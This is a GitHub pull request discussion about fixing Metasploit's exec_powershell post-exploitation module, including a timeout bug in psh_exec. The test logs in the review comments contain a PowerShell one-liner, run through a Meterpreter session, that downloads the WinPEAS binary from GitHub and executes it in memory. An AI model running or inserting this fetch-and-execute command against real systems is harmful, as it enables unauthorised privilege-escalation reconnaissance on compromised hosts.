-
Notifications
You must be signed in to change notification settings - Fork 14.4k
Remove errant write_log call and swap to the all-in-one psh_exec rath… #20412
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
Conversation
…er than execute_script
Win 10x64 21H2 with admin Meterpreter Session
|
As a question to the powershellers out there..... what is the difference between this script and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/exec_powershell.rb ? |
So I think |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The module will fail if Powershell script is taking too long and timeout is not increased:
msf post(windows/manage/powershell/exec_powershell) > run
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
[*] Compressing script contents.
[+] Compressed size: 617
[*] Executing the script.
[+] Compressed size: 2608
[-] Post failed: NoMethodError undefined method `strip' for nil:NilClass
[-] Call stack:
[-] /home/ms/git/metasploit-framework/lib/msf/core/post/windows/powershell.rb:356:in `psh_exec'
[-] /home/ms/git/metasploit-framework/modules/post/windows/manage/powershell/exec_powershell.rb:120:in `run'
[*] Post module execution completed
Should we adjust this with rescue
block, fixing the library where the fail happens (ps_output = ps_output[/#{start}(.*?)#{stop}/m, 1].strip
in lib/msf/core/post/windows/powershell.rb
- strip is not defined for nil
) or leave it up to user?
With timeout
increased, works as expected:
msf post(windows/manage/powershell/exec_powershell) > run verbose=true
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
[*] Compressing script contents.
[+] Compressed size: 613
[*] Executing the script.
[+] Compressed size: 2592
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
[SNIPPED]
In playing with #20208, I wondered why we did not just run the PowerShell script directly in memory, so I tried it, and it failed:
I pulled the
write_to_log
out and replaced the call toexecute_script
withpsh_exec
since that method seemed to do everything automagically.If anyone knows where the
write_to_log
method went or a better way to getexecute_sccript
to work.The script I used for testing was WinPEASS: